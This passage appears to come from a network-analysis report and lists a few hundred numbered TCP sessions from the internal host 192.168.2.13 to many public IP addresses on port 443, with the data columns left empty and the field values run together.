                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9952192.168.2.1347044174.58.47.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9953192.168.2.134135619.67.81.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9954192.168.2.136059080.166.152.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9955192.168.2.135921450.163.65.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9956192.168.2.134780677.78.108.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9957192.168.2.1333126154.204.213.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9958192.168.2.135789813.188.64.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9959192.168.2.1359986158.147.100.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9960192.168.2.1354754153.249.75.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9961192.168.2.133702642.97.11.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9962192.168.2.135195697.237.100.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9963192.168.2.1345498182.101.112.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9964192.168.2.1360558221.59.107.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9965192.168.2.1357082216.230.88.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9966192.168.2.1338198162.30.115.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9967192.168.2.134657671.29.163.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9968192.168.2.1342984154.147.104.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9969192.168.2.134690251.11.254.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9970192.168.2.1340002161.192.110.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9971192.168.2.1344440223.19.99.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9972192.168.2.133295245.233.101.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9973192.168.2.135177478.88.168.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9974192.168.2.1358786190.41.186.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9975192.168.2.135867246.254.218.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9976192.168.2.134862062.174.35.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9977192.168.2.1338124160.226.231.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9978192.168.2.134331643.86.88.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9979192.168.2.1346354168.150.18.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9980192.168.2.1343758132.23.76.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9981192.168.2.135882890.25.161.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9982192.168.2.1349248201.99.236.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9983192.168.2.135627436.110.75.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9984192.168.2.1335242119.143.109.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9985192.168.2.1337604193.71.123.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9986192.168.2.13576785.24.242.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9987192.168.2.135738039.129.216.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9988192.168.2.1351150113.53.88.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9989192.168.2.134820093.125.18.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9990192.168.2.135328018.140.160.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9991192.168.2.13518244.109.69.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9992192.168.2.135430679.61.68.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9993192.168.2.1357660208.169.148.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9994192.168.2.1337038137.198.46.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9995192.168.2.1344948143.84.42.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9996192.168.2.1346368219.83.27.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9997192.168.2.133652014.202.253.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9998192.168.2.135403035.197.197.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9999192.168.2.134813041.66.73.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10000192.168.2.1357612161.205.58.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10001192.168.2.1348154168.29.211.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10002192.168.2.135577012.229.67.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10003192.168.2.1338510108.1.221.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10004192.168.2.13571581.148.99.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10005192.168.2.1345514189.217.208.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10006192.168.2.1360166137.100.141.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10007192.168.2.133761880.234.111.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10008192.168.2.1334528203.106.104.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10009192.168.2.135168677.186.206.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10010192.168.2.1341572121.90.21.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10011192.168.2.133740027.120.26.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10012192.168.2.1346128123.48.166.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10013192.168.2.1335812205.9.8.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10014192.168.2.1339156209.111.243.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10015192.168.2.1359220126.247.110.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10016192.168.2.133512888.105.170.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10017192.168.2.1338744155.13.208.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10018192.168.2.1358170166.113.235.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10019192.168.2.1334474203.69.126.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10020192.168.2.1338670199.147.83.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10021192.168.2.1356570206.161.32.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10022192.168.2.134941017.88.138.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10023192.168.2.1335984171.202.255.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10024192.168.2.134251273.191.207.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10025192.168.2.1335152200.178.124.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10026192.168.2.1333216111.71.245.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10027192.168.2.133315239.130.167.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10028192.168.2.1333314107.85.133.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10029192.168.2.1345320176.71.186.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10030192.168.2.1338440108.64.88.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10031192.168.2.133821884.66.208.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10032192.168.2.1353766139.10.212.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10033192.168.2.134858454.88.130.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10034192.168.2.1355264216.72.38.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10035192.168.2.1337128129.236.42.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10036192.168.2.133465292.152.178.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10037192.168.2.1337842115.83.240.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10038192.168.2.135844871.85.121.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10039192.168.2.134112613.87.138.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10040192.168.2.13505605.150.166.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10041192.168.2.134359218.232.138.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10042192.168.2.1352696124.118.30.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10043192.168.2.1350736192.147.212.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10044192.168.2.135873277.122.178.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10045192.168.2.1355720219.83.7.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10046192.168.2.1353964137.83.204.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10047192.168.2.135359285.157.73.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10048192.168.2.1342304165.236.3.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10049192.168.2.134931490.143.255.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10050192.168.2.1350804161.127.112.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10051192.168.2.1344526223.17.205.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10052192.168.2.1344040151.219.60.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10053192.168.2.13342461.188.53.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10054192.168.2.1354702108.210.37.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10055192.168.2.1354380117.32.10.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10056192.168.2.1360148220.136.194.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10057192.168.2.134874234.230.55.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10058192.168.2.134677679.125.44.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10059192.168.2.1335074179.104.232.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10060192.168.2.135390450.48.25.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10061192.168.2.1338918179.164.149.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10062192.168.2.134414692.245.121.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10063192.168.2.1357908106.202.119.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10064192.168.2.1333488131.186.90.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10065192.168.2.1358988177.241.55.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10066192.168.2.1352252182.74.186.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10067192.168.2.1336194100.154.224.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10068192.168.2.133445249.159.146.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10069192.168.2.1333032115.192.154.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10070192.168.2.1352876107.160.242.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10071192.168.2.1350974143.12.208.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10072192.168.2.134960247.125.122.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10073192.168.2.134598220.11.65.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10074192.168.2.134688681.32.70.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10075192.168.2.1345682121.178.65.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10076192.168.2.134551657.48.97.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10077192.168.2.135009087.241.218.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10078192.168.2.1360922108.53.187.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10079192.168.2.1350034101.232.102.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10080192.168.2.134794841.116.130.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10081192.168.2.135118070.160.99.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10082192.168.2.1339078185.166.33.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10083192.168.2.1355486185.222.154.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10084192.168.2.1337174117.206.84.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10085192.168.2.133578827.21.104.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10086192.168.2.134124659.143.30.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10087192.168.2.1360368125.238.229.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10088192.168.2.1347566194.174.71.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10089192.168.2.1354724198.225.26.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10090192.168.2.135351474.167.173.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10091192.168.2.133304081.115.125.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10092192.168.2.1346238156.105.2.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10093192.168.2.1337292205.74.175.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10094192.168.2.1359758123.108.72.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10095192.168.2.1359952161.106.63.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10096192.168.2.1337824160.198.238.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10097192.168.2.1359240222.248.18.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10098192.168.2.1341130110.161.153.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10099192.168.2.1355898173.104.90.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10100192.168.2.1355664149.59.224.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10101192.168.2.135935274.19.5.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10102192.168.2.1339626213.40.116.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10103192.168.2.1339808129.69.253.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10104192.168.2.133507887.11.23.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10105192.168.2.133617840.246.12.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10106192.168.2.1344224168.216.92.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10107192.168.2.133917819.162.102.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10108192.168.2.13571189.48.232.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10109192.168.2.134977640.186.195.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10110192.168.2.1350652217.81.138.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10111192.168.2.1340812210.145.215.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10112192.168.2.1347006199.117.3.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10113192.168.2.1336868133.3.108.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10114192.168.2.1345330162.166.76.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10115192.168.2.1352784110.146.233.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10116192.168.2.133992020.14.219.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10117192.168.2.133753683.129.61.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10118192.168.2.1345816117.82.148.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10119192.168.2.13395049.150.237.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10120192.168.2.134174472.74.237.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10121192.168.2.134822854.54.43.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10122192.168.2.133753460.125.195.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10123192.168.2.1338286169.213.110.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10124192.168.2.133462218.107.87.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10125192.168.2.134394834.248.135.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10126192.168.2.135300684.229.76.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10127192.168.2.133446476.117.75.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10128192.168.2.1352504121.201.8.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10129192.168.2.1350834120.203.64.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10130192.168.2.1353428218.25.98.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10131192.168.2.1351320105.230.199.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10132192.168.2.1355222118.42.5.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10133192.168.2.1354234159.77.201.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10134192.168.2.135669419.86.151.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10135192.168.2.1335214197.122.168.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10136192.168.2.135857272.134.190.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10137192.168.2.135128862.173.146.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10138192.168.2.134202846.197.0.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10139192.168.2.1352946134.142.45.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10140192.168.2.1360216192.115.42.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10141192.168.2.1351438108.167.11.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10142192.168.2.1335266145.41.237.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10143192.168.2.134651245.217.149.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10144192.168.2.1338528187.101.208.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10145192.168.2.133604419.183.52.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10146192.168.2.134176478.189.87.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10147192.168.2.135884849.162.135.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10148192.168.2.1343840201.229.179.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10149192.168.2.1336332142.79.137.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10150192.168.2.135547241.250.102.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10151192.168.2.1344236220.244.59.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10152192.168.2.1359580161.153.33.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10153192.168.2.1337500194.238.9.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10154192.168.2.1340490169.254.24.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10155192.168.2.13335508.89.85.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10156192.168.2.135758036.106.171.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10157192.168.2.1347012153.151.208.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10158192.168.2.135812445.183.166.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10159192.168.2.134214014.18.89.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10160192.168.2.135099663.177.48.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10161192.168.2.136054647.18.197.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10162192.168.2.1338040190.153.158.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10163192.168.2.13463784.45.232.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10164192.168.2.135509464.156.248.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10165192.168.2.1353494133.44.90.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10166192.168.2.1341588114.165.140.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10167192.168.2.133869052.231.148.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10168192.168.2.135800460.225.185.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10169192.168.2.134205074.106.171.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10170192.168.2.1349690159.190.168.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10171192.168.2.13450764.37.106.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10172192.168.2.1353918211.232.70.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10173192.168.2.1348218141.203.154.183443
